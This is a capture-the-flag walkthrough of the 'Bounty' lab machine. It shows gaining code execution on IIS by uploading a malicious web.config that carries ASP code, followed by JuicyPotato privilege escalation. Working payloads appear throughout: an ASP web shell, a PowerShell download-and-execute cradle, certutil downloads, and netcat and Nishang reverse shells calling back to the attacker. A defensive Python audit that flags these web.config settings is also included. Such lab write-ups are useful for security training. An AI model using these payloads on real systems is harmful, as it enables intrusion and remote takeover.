Prerequisites
web.config file upload, reverse shell with Nishang's Invoke-PowerShellTcp.ps1
JuicyPotato privilege escalation
Information gathering and getting a foothold
Start with a quick nmap scan: nmap 10.10.10.93. The scan returned a lot of results, which I went through slowly; since port 80 is open, the first step is to visit it in the browser.
I also ran nikto afterwards, but still found nothing important beyond the fact that the site is ASP, so it was time for brute force. Here I tried gobuster, a brute-forcing tool popular overseas, with the dirbuster wordlist (bundled with Kali):
gobuster dir -u http://10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -o Bounty -x aspx -q
Output:
/transfer.aspx (Status: 200)
/UploadedFiles (Status: 301)
/uploadedFiles (Status: 301)
/uploadedfiles (Status: 301)
Obviously the first page to visit is http://10.10.10.93/transfer.aspx, which turns out to allow file upload. Uploading an aspx file directly is rejected, so there is some validation; time to fire up Burp.
After some trying I found that a web.config file can be uploaded.
For how a web.config upload can be turned into an attack, see these articles:
Upload a web.config File for Fun & Profit
Uploading web.config for Fun and Profit 2
The role of Web.config in penetration testing
Create the Web.config file for an ASP.NET application
RCE by uploading a web.config
To test whether the web.config actually gets executed, create a new file with the following content:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
It still errored, though; the error message is as follows:
Server Error in '/' Application.
Runtime Error
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration>
Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
</system.web>
</configuration>
Modify the file according to the error message: basically take the second snippet the error page gives and change defaultRedirect to web.config.
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="web.config"/>
</system.web>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
The upload succeeded, but when visiting it the server still returned 500; at least it got uploaded.
Modified it again and found the problem was the & in the last few lines on my side; somehow they had been copied wrong. Removed them; the content is as follows:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="web.config"/>
</system.web>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
The result of visiting it is as follows:
I found a web.config shell in PayloadsAllTheThings and adjusted it against the one above. I also noticed another problem: this box's reset timer seems a bit off, so sometimes it errors even when the upload succeeded, which makes things quite hit-or-miss.
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="web.config"/>
</system.web>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!--
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("whoami")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre>")
Response.write("<!-"&"-") %>
-->
<!-- web.config payload from https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/ -->
Hmm, this shell also returned 500, no idea why; all I could do was keep tweaking based on the earlier one, and try a ping:
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c ping 10.10.14.3")
o = cmd.StdOut.Readall()
Response.write(o)
%>
Run this locally first:
sudo tcpdump icmp -i tun0
Still 500, unclear why, and after a while it turns into a 404, so there must be a script running in the background.
Copy Nishang's Invoke-PowerShellTcp.ps1 and append one line at the end to call back:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 443
Finally, serve it over HTTP:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="web.config"/>
</system.web>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<%@ Language=VBScript %>
<%
call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.3/Invoke-PowerShellTcp.ps1')")
%>
It never called back, so I could only try my luck with the earlier shell; note that the time window here is very short.
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="web.config"/>
</system.web>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!--
<% Response.write("-"&"->")%>
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
<%Response.write("<!-"&"-") %>
-->
Quickly run the download; the following failed:
certutil.exe -urlcache -f http://10.10.14.3/nc.exe C:\WINDOWS\TEMP\nc.exe
Then change the payload to:
cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.3/Invoke-PowerShellTcp.ps1')
Locally I could see the HTTP request arriving, but execution just would not succeed; maybe the reset interval is shorter than the time it takes me to get the file over.
A day later I tried again and, well, it turned out I had mistyped the filename.
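Every variant of the uploaded web.config above relies on the same handful of settings: a handler that routes *.config through a script engine, request-filtering removals that unblock the .config extension and the web.config segment, a custom error page pointed back at the file, and code smuggled after the closing root element. The following Python check is added here as an example (it is not from the original writeup) and flags those settings so an upload filter or a config audit can reject such a file; audit_web_config and both sample configs are constructed for this illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample carrying the same settings as the uploaded web.config above.
SUSPICIOUS_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web><customErrors mode="RemoteOnly" defaultRedirect="web.config"/></system.web>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule"
     scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll" resourceType="Unspecified" />
</handlers>
<security><requestFiltering>
<fileExtensions><remove fileExtension=".config" /></fileExtensions>
<hiddenSegments><remove segment="web.config" /></hiddenSegments>
</requestFiltering></security>
</system.webServer>
</configuration>
<!-- <% Response.write(1+2) %> -->
"""

# Constructed benign file: only sets the error mode, nothing after the root element.
BENIGN_CONFIG = '<configuration><system.web><customErrors mode="On"/></system.web></configuration>\n'


def audit_web_config(text):
    """Return finding tags for one web.config body (hypothetical helper, not IIS's own)."""
    findings = []
    # The ASP code sits after </configuration>, where XML validation never looks.
    head, sep, tail = text.rpartition("</configuration>")
    if sep and tail.strip():
        findings.append("trailing-content-after-root")
    try:
        root = ET.fromstring(((head + sep) if sep else text).strip())
    except ET.ParseError:
        return findings + ["unparseable-xml"]
    for h in root.iter("handlers"):            # Script plus Write on a handler group
        if "write" in h.get("accessPolicy", "").lower():
            findings.append("handlers-accessPolicy-write")
    for add in root.iter("add"):               # *.config routed to a script engine
        if add.get("scriptProcessor") and ".config" in add.get("path", "").lower():
            findings.append("config-mapped-to-script-processor")
    for rm in root.iter("remove"):             # request-filtering defaults undone
        if rm.get("fileExtension", "").lower() == ".config":
            findings.append("config-extension-unblocked")
        if rm.get("segment", "").lower() == "web.config":
            findings.append("web.config-segment-unhidden")
    for ce in root.iter("customErrors"):       # error page pointed back at the file
        if ce.get("defaultRedirect", "").lower().endswith("web.config"):
            findings.append("customErrors-redirects-to-web.config")
    return findings
```

Rejecting any upload whose name is web.config (case-insensitively) at the upload handler is the simpler first control; this audit is for files that have already landed on disk.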
Privilege escalation
Check the system information first: it is Server 2008, so JuicyPotato is the first option to consider.
PS C:\windows\system32\inetsrv>systeminfo
Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 12/18/2020, 8:30:13 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,597 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,597 MB
Virtual Memory: In Use: 498 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
Check privileges: whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
So it is usable:
CreateProcessWithToken (needs SeImpersonate)
CreateProcessAsUser (needs SeAssignPrimaryToken)
Download JuicyPotato and nc:
certutil.exe -urlcache -f http://10.10.14.3/JuicyPotato.exe C:\WINDOWS\TEMP\JuicyPotato.exe
certutil.exe -urlcache -f http://10.10.14.3/nc.exe C:\WINDOWS\TEMP\nc.exe
Locally start a new nc listener on a port, then go back to the shell and run:
C:\WINDOWS\TEMP\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c C:\WINDOWS\TEMP\nc.exe -e cmd.exe 10.10.14.3 5555" -t *
Side note: user.txt only shows up with dir /a.